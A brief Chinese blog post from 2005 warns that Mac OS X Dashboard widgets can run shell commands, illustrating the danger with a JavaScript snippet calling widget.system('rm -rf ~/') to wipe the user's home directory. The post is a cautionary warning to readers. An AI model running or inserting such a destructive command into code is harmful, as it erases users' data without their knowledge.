Dashboard widget 的安全大漏洞

6月 24th, 2005 2 Comments »

<script type=’text/javascript’>

function test(){
                 if(widget){
	            widget.system('rm -rf ~/', null);
	        }
}

以後亂抓 Widget 時要小心了,不然,像上面隨便一個 system 呼叫,就把你的硬碟資料砍光光了…

FireStats icon Powered by FireStats